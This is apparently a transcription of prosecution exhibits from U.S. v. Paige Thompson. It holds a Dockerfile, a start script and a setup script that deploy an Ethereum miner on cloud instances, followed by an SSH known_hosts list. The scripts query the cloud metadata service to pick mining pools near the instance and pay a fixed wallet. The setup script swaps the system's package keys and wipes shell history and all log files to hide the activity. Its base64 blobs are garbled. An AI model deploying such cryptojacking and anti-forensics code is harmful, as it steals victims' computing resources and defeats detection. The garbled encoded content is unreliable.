**./Dockerfile**

```
FROM nvidia/cuda:10.0-runtime-ubuntu18.04

# NVidia required
ENV NVIDIA_VISIBLE_DEVICES=0

ENV EMREL="https://github.com/ethereum-mining/ethminer/releases/download/v0.17.0/ethminer-0.17.0-linux-
x86_64.tar.gz"

RUN apt-get update && apt-get install -y --no-install-recommends \
    vim \
    curl \
    wget && \
    rm -rf /var/lib/apt/lists/*

RUN mkdir /ethminer

WORKDIR /ethminer

RUN wget --no-check-certificate $EMREL &&\
    tar -xvf ./*.tar.gz &&\
    rm *.tar.gz

COPY start.sh .

EXPOSE 3333/tcp

ENTRYPOINT [ "/bin/bash" ]
```

U.S. v. Paige Thompson
CR19-159 RSL
Plaintiff's Exhibit No. 800
Admitted_____

**./start.sh**

```
#!/bin/bash

export WORKER=$(hostname | tr -d '\n')
export ETH_ACCT="0x5a86a6ff21aac657ca820e24518f065b915ea74f"
export CUDAPH=4

placement=$(curl -s http://169.254.169.254/latest/meta-data/placement/availability-zone)

if [[ "$placement" == *"us-east"* ]]; then
   export POOL1="eth-us-east1.nanopool.org:9999"
   export POOL2="eth-us-west1.nanopool.org:9999"

elif [[ "$placement" == *"us-west"* ]]; then
   export POOL2="eth-us-east1.nanopool.org:9999"
   export POOL1="eth-us-west1.nanopool.org:9999"

elif [[ "$placement" == *"eu-"* ]]; then
   export POOL1="eth-eu1.nanopool.org:9999"
   export POOL2="eth-eu2.nanopool.org:9999"

elif [[ "$placement" == *"ap-northeast-1"* ]]; then
   export POOL2="eth-asia1.nanopool.org:9999"
   export POOL1=":eth-jp1.nanopool.org:9999"

elif [[ "$placement" == *"ap-southeast-2"* ]]; then
   export POOL1="eth-au1.nanopool.org:9999"
   export POOL2="eth-au1.nanopool.org:9999"

elif [[ "$placement" == *"ap-"* ]]; then
   export POOL1="eth-asia1.nanopool.org:9999"
   export POOL2=":eth-jp1.nanopool.org:9999"

else
   export POOL1="eth-us-east1.nanopool.org:9999"
   export POOL2="eth-us-west1.nanopool.org:9999"
fi


export GPU_FORCE_64BIT_PTR=0
export GPU_MAX_HEAP_SIZE=100
export GPU_USE_SYNC_OBJECTS=1
export GPU_MAX_ALLOC_PERCENT=100
export GPU_SINGLE_ALLOC_PERCENT=100

/ethminer/bin/ethminer -R -U -P stratum://$ETH_ACCT.$WORKER@$POOL1 stratum://$ETH_ACCT.$WORKER@$POOL2 -
-cuda-parallel-hash $CUDAPH --api-port 3333
```

U.S. v. Paige Thompson
CR19-159 RSL
Plaintiff's Exhibit No. 801
Admitted_____

**./minersetup_eth.sh**

```
#!/bin/bash
echo "
deb https://nvidia.github.io/libnvidia-container/ubuntu18.04/amd64 /
deb https://nvidia.github.io/nvidia-container-runtime/ubuntu18.04/amd64 /
deb https://nvidia.github.io/nvidia-docker/ubuntu18.04/amd64 /
deb http://us-east-1.ec2.archive.ubuntu.com/ubuntu/ bionic main restricted
deb-src http://us-east-1.ec2.archive.ubuntu.com/ubuntu/ bionic main restricted
deb http://us-east-1.ec2.archive.ubuntu.com/ubuntu/ bionic-updates main restricted
deb-src http://us-east-1.ec2.archive.ubuntu.com/ubuntu/ bionic-updates main restricted
deb http://us-east-1.ec2.archive.ubuntu.com/ubuntu/ bionic universe
deb-src http://us-east-1.ec2.archive.ubuntu.com/ubuntu/ bionic universe
deb http://us-east-1.ec2.archive.ubuntu.com/ubuntu/ bionic-updates universe
deb-src http://us-east-1.ec2.archive.ubuntu.com/ubuntu/ bionic-updates universe
deb http://us-east-1.ec2.archive.ubuntu.com/ubuntu/ bionic multiverse
deb-src http://us-east-1.ec2.archive.ubuntu.com/ubuntu/ bionic multiverse
deb http://us-east-1.ec2.archive.ubuntu.com/ubuntu/ bionic-updates multiverse
deb-src http://us-east-1.ec2.archive.ubuntu.com/ubuntu/ bionic-updates multiverse
deb http://us-east-1.ec2.archive.ubuntu.com/ubuntu/ bionic-backports main restricted universe
multiverse
deb-src http://us-east-1.ec2.archive.ubuntu.com/ubuntu/ bionic-backports main restricted universe
multiverse
deb http://security.ubuntu.com/ubuntu bionic-security main restricted
deb-src http://security.ubuntu.com/ubuntu bionic-security main restricted
deb http://security.ubuntu.com/ubuntu bionic-security universe
deb-src http://security.ubuntu.com/ubuntu bionic-security universe
deb http://security.ubuntu.com/ubuntu bionic-security multiverse
deb-src http://security.ubuntu.com/ubuntu bionic-security multiverse
deb [arch=amd64] https://download.docker.com/linux/ubuntu bionic stable" > /etc/apt/sources.list
mv -f /etc/apt/trusted.gpg /etc/apt/~trusted.gpg
echo "
"mQINBFnNWDEBEACiX68rxIWvqH3h2GyKO25oK9BAqV8fDtb6lXEbw3eKx4g87BRzM3DQBA0S0IfkQ72ovJ33H50+gVTXuu+Zme5muW
k72m3pApccZVDLqdzYlpWPruNbMC+IlWr70yo8Jw8Zr1ihbWjFvMbDJTkgqPt2djNq3xxvdiKoZlgnpLRKIpSu9iBQlNoZLHxTQKFH4
219L77prRogv2QV1ckBL5lDVOERJuHo4jHE8mm9/NZ6v3m2HGuuAEZ77T9nWlPGiAIP8Pww4ZRTJcBANcI2EFKPLdfP61HTH6w0kVMko
AaGlemadTDl3ZcLpUpTFLc+ko/2uQ1qVPx9QYyoMrorS3kUmlXrhsA7FvcB09aIcb+JX6SVkcbO5A5+baCa3owwUtFBXMHM5hqpLv4P
3/GsuW6283YwLZCf53dJY4lJZePqzPGsvs/wSvhnZrFvb61i/Aqm0hjhVh7h6VNxUiE8geMcjxy29LtzajoyS0EPVxes4xZu0VbS78L
QyCNHSpS7TFmtVUQmbXqDN7cpiyr9+yutr0lZOMc7NYQt0nP/3RtYkWEob6wXarVImHas10Yz1ZymdO1uAnqkediS61E2vSD1OEq37/
375FB/Q3AYXuNkQzDjYoJJz9wsv7Xp0bdPzQ/daLdIFNQXo5MmVIirsWM07JvbZaJhDOiJxGn0MPf11/QARAQABtEBOVklESUEgQ09S
UE9SQVRIT04gKE9wZW4gU291cmNlIFByb2plY3RzRXSA8Y3VkYXRvc)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
```

U.S. v. Paige Thompson
CR19-159 RSL
Plaintiff's Exhibit No. 802
Admitted_____

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" | base64
-d > /etc/apt/trusted.gpg

dockerfile="RlJPTSBudmlkaWEvY3VkYToxMC4wLXJ1bnRpbWUtdWJ1bnR1MTguMDQKCiMgTlZpZGlhIHJlcXVpcmVkcKVOViBOVkl
ESUFfVklTSUJMRV9ERVZJQ0VTPTAKCkVOViBFTVJFTD0iaHR0cHM6Ly9naXRodWIuY29t1LV0baUvZyXVtLW1pbmluZy9ldGhtaW51ci
9yZWxlYXNlcy9kb3dubG9hZC9C92MC4xNy4wL2V0aGG1pbmVyLTAuMTcuMC1saW51eC140DZfNjQudGFyLmd61goKUlVOIGFwdC1nZXQgd
XBkYXRllICYmIGFwdC1nZXQgaW5zdGFsbCAte5AtLW5vLWluc3RhbGwtcmVjb21tZW5kcyBjClAgICBzaW0gcICAgY3VybCBcCiAg
ICB3Z2V0IICYmIFwKICAgIEH3tTC1yZiAvdmFyL2xpYi9hcHQve2xpc3QqLW5hbm9wb29sLm9yZyc50Tk5IgoKZWxpZiBbWyAiJHBsYWNlbWVudC
IgPT0gkiI3cy13ZXN0IiogXV07IHRoZW4KICBleHBvcnQgUE9PTDI9ImV0aC11cy11YXN0M5SuYW5vcG9vbC5vcmc6OTk5OSIKICElgBe
HBvcnQgUE9PTDE9ImV0aC11cy13ZXN0M5SuYW5vcG9vbC5vcmc6O0Tk5OSIKCmVsaWYgW1sgIiRwbGFjZW1lbnQiID09ICoiZXUtbiog
XV07IHRoZW4KICIBleHBvcnQgUE9PTDE9ImV0aC11dTEubmV1b3Vb2wub3JnOjk5OTkiCiAgZXhwb3J0IFBPT0wyPSJldGgtZXUtbi5u
hbm9wb29sLm9yZzo5OTk5IgoKZWxpZiBbWyAiJHBsYWNlbWVudCIgPT0gKi1hc1bu13J0aGVhc3QtMSIqIF1dOyB0aGVuCiAgZXhwb3
J0IFBPT0wyPSJldGgtYXNpYTEubmFub3Bvb2wub3JnOjk5OTkiCiAgZXhwb3J0IFBPT0wxPSJ1S6ZXRoLWpwMS5uYW5vcG9vbC5vcmc6O
Tk5OSIKCmVsaWYgW1sgIiRwbGFjZW1lbnQiID09ICoiYXAtc291dGhlYXN0LTIiIogXV07IHRoZW4KICIBleHBvcnQgUE9PTDI9ImV0aC1hdTEubmF1b3Bvb2wub3JnOjk5OTkiCiAgZXhwb3J0IFBPT0wxPSJldGgtYXNpYTEubmFub3Bvb2wub3JnOjk5OTkiCi
kcGxhY2VtZW50S 0IiA9PSAqImFwLSIqIF1dOyB0aGVuCiAgZXhwb3J0IFBPT0wyPSJldGgtYXNpYTEubmFub3Bvb2wub3JnOjk5OTkiCi

AgZXhwb3J0IFBPT0wyPSI6ZXRoLWpwMS5uYW5vcG9vbC5vcmc6OTk5OSIKCmVsc2UgCiAgZXhwb3J0IFBPT0wxPSJldGgtdXMtZWFzdDEubmFjb3B3dWIzJnbvb3wub3J0IFBPT0wyPSJ1dGd0dXMtZWFzdDEub25vb3wub3J0IFBPT0wyPSJ1ZGd0dXMtZWFzdDEVzdDEubmZ1b3Bvb3dvb3wub3J0IFBPT0wyPSJ1ZGd0dXMtZWFzdDIVzdDEubmZ1b3Bvb3dvb3wub3J0IFBPT0wyPSJ1ZGd0dXMtZWFzdDIVzdDEubmZ1b3Bvb3dvb3wub3J0IFBPT0wyPSJ1ZGd0dXMtZW
b3J0IEdQVV9GT1JDRV82NEJJVF9QVFI9MApleHBvcnQgR1BVX01BWF9IRUFQX1NJWkU9MTAwCmV4cG9ydCBHUFVfVVNFX1NZTkNfT0J
KRUNUUz0xCmV4cG9ydCBHUFVfTUFYX0FMTE9DX1BFUkNFT1Q9MTAwCmV4cG9ydCBHUFVfVU0lOR0xFX0FMTE9DX1BFUkNFT1Q9MTAwCg
ovZXRobWluZXIvZmluaUl2V0aG1pbmVyIC1SIC1VIC1QIHN0cmF0dW06Ly8kkRVRIX0FDQ1QuJFdfPUktFUkAkUE9PTDEgc3RyYYXR1bTovL
yRFVEhfQUNDVC4kV09SS0VSOVSQCRQT09MMiAtLWN1ZGEtcGFyYWxsZWwtaGFzaCAkQ1VEQVBIIC0tYXBpLXBvcnQgMzMwMwo="
curl 'http://us.download.nvidia.com/tesla/410.104/nvidia-diag-driver-local-repo-ubuntu1804-410.104_1.0-
1_amd64.deb' -H 'Connection: keep-alive' -H 'Upgrade-Insecure-Requests: 1' -H 'User-Agent: Mozilla/5.0
(X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.109 Safari/537.36' -H
'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8' -H
'Accept-Encoding: gzip, deflate' -H 'Accept-Language: en-US,en;q=0.9' -L -O -J

```
echo $dockerfile | base64 -d > Dockerfile
echo $startsh | base64 -d > start.sh
chmod +x start.sh
dpkg -i nvidia-diag-driver-local-repo-ubuntu1804-410.104_1.0-1_amd64.deb
apt-get -y update
apt-get -y install apt-transport-https \
ca-certificates \
curl \
gnupg-agent \
software-properties-common \
nvidia-modprobe \
nvidia-384 \
docker-ce \
docker-ce-cli \
containerd.io \
nvidia-docker2 \
nvidia-container-runtime \
netcat-openbsd
apt-get -y upgrade
sudo pkill -SIGHUP dockerd
systemctl restart docker
docker build -t miner/miner .
docker run -d -i -t --runtime=nvidia --shm-size=1g -e NVIDIA_VISIBLE_DEVICES=$(seq 0 $(($(nvidia-smi -L
| wc -l | tr -d '\n')-1)) | tr '\n' ',' | head -c -1 | tr -d '\n') --rm miner/miner start.sh
ln -sf /dev/null /root/.bash_history
ln -sf /dev/null /home/ubuntu/.bash_history
find /var/log -type f | xargs -i -t truncate -s 0 {}
rm *
```

```
192.168.1.20 ecdsa-sha2-nistp256
AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBIeez3jb6ACr0nhzLH2CV974kC14635i395v/GcJkI2QQ9pj83wHItx
FUXwhtTpSO3qITzrGhCq0UbzV1SPaSgQ=
206.125.168.65 ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIMbJE0BtwQxJngRuV8hykOn0YMZeN7ZyjUQuBT6qxwgl
208.79.92.66 ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIMbJE0BtwQxJngRuV8hykOn0YMZeN7ZyjUQuBT6qxwgl
192.168.0.22 ecdsa-sha2-nistp256
AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBIeez3jb6ACr0nhzLH2CV974kC14635i395v/GcJkI2QQ9pj83wHItx
FUXwhtTpSO3qITzrGhCq0UbzV1SPaSgQ=
vpn.yourstruly.sx,52.11.150.42 ecdsa-sha2-nistp256
AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBPGI0crks9PFNj6WzkQhoUCSIEUn5svVVQKiqcRpTv2MfNOKYA9PgCl
+lbDf9JVHDp4V9l6ree67Z2WiJUjseY=
192.168.1.11 ecdsa-sha2-nistp256
AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBIeez3jb6ACr0nhzLH2CV974kC14635i395v/GcJkI2QQ9pj83wHItx
FUXwhtTpSO3qITzrGhCq0UbzV1SPaSgQ=
52.36.69.175 ecdsa-sha2-nistp256
AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBA9ZhiJDgwrr9mQLoUogpOOgksJ7NwUfGPE0Rfpfk4U5WNMHf4S9/Hl
dRj0Ms8DWNfNGzeSDOFuG740vZfm4FMk=
192.168.1.248 ecdsa-sha2-nistp256
AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBIeez3jb6ACr0nhzLH2CV974kC14635i395v/GcJkI2QQ9pj83wHItx
FUXwhtTpSO3qITzrGhCq0UbzV1SPaSgQ=
206.125.168.70 ecdsa-sha2-nistp256
AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBPjcgMbamvmzziRFhlQwreKNWIquUl9Rcc13IcRb9W6MCh0eT4xq9eX
jYp59750pZ2sIr94/OJzVfmfH5d4sMi0=
206.125.168.71 ecdsa-sha2-nistp256
AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBLm2ERIkc+8atEUeovhITp9aC3W309Hwx8DrmV1U/teP3tt6hxJVJu2
l/6otygHBHXudIp7+tYFZSiIyzqTw0pw=
192.168.1.7 ecdsa-sha2-nistp256
AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBK6KoG1E2GWKvKcQhugNcDeMHMAnMdweMVtvBvvWCa3COUqdhmMK22P
QA2u4OHNmMEjdCZt7mJJK660TD8ZwKLs=
10.0.0.2 ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIFeGnv3SMX63OmSfz/nDLIR+ZEJYLOUzxOxBVy9BIIeF
[108.60.139.227]:2222 ecdsa-sha2-nistp256
AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBAkZdh/vs2d2QdXKbpIBWnAVK/+lVfWXcBfXfZ/zViSnpC4ke1F7rbG
vootTIKBUu0RGk65DAbIh1ZoymsYbCwQ=
[108.60.139.227]:2020 ssh-rsa
